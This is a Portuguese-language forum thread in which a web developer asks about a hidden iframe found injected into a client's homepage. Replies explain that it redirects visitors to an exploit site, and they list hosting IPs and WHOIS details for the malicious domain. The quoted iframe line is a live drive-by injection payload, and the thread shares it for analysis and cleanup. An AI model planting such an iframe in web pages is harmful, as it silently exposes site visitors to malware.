Usamos cookies para medir audiência e melhorar sua experiência. Você pode aceitar ou recusar a qualquer momento. Veja sobre o iMasters.
Olá pessoal, não sei se estou postando no tópico certo mas...
Me deparei com o seguinte código em uma pagina index:
<iframe src="hxxp://xe6.ru:8080/index.php" width=126 height=152 style="visibility: hidden"></iframe>
Esse código tem sido barrado pelos buscadores, já que é reconhecido código malicioso, alguém tem informação sobre o que é?
Trabalho com desenvolvimento de Web Sites e em um dos clientes, a pagina inicial ficou desconfigurada e aparecia esse código que postei acima, e logo depois foi barrado pelo Google.
Como é a primeira vez que me deparo com isso queria saber mais informações e como proceder. Já que não sei se é só remover essa parte do código.
Provavelmente seu cliente foi vitima de um defacer, verifique os arquivos de paginação e SQL
Ok, já tinha efetuado tais ações.
Muito obrigado pelas informações.
Caso resolvido
PROBLEMA RESOLVIDO!
Caso o autor necessite que o tópico seja reaberto basta enviar uma Mensagem Privada para um Moderador com um link para o tópico.
Olá esse código tem nele uma url que injeta na maquina um exploit, veja como funciona o esquema:
Existe uma url presente no código postato por você que redireciona a pessoa para outro site infectado.
AVISO Não execute nenhuma url listada aqui em seu navagedor
91.121.89.185 ns27903.ovh.net
91.121.146.101 ks357228.kimsufi.XXX (AVISO: domínios com terminação retirada para que usuários não cliquem)
91.121.167.41 ks361128.kimsufi.XXX
79.170.89.217 netvibe.xlshosting.XXX
Name servers:
% By submitting a query to RIPN's Whois Service
% you agree to abide by the following terms of use:
% hxxp://www.ripn.net/about/servpol.html#3.2 (in Russian)
% hxxp://www.ripn.net/about/en/servpol.html#3.2 (in English).
domain: XE6.RU
type: CORPORATE
nserver: ns1.freeonlinednshost.com.
nserver: ns2.freeonlinednshost.com.
nserver: ns3.freeonlinednshost.com.
nserver: ns4.freeonlinednshost.com.
state: REGISTERED, DELEGATED
person: Liliya T Ahmadullina
phone: +7 3412 930011
e-mail: lili@co5.ru
registrar: REGRU-REG-RIPN
created: 2009.06.29
paid-till: 2010.06.29
source: TC-RIPN
Additional information
Redirections:
Malicious sites is hosted on 1 domain including:
ozdemirlerhirdavat.com
Me diga qual o motivo de seu questionamento?
Sua maquina esteve em contato com esse código?
Aguardo seu retorno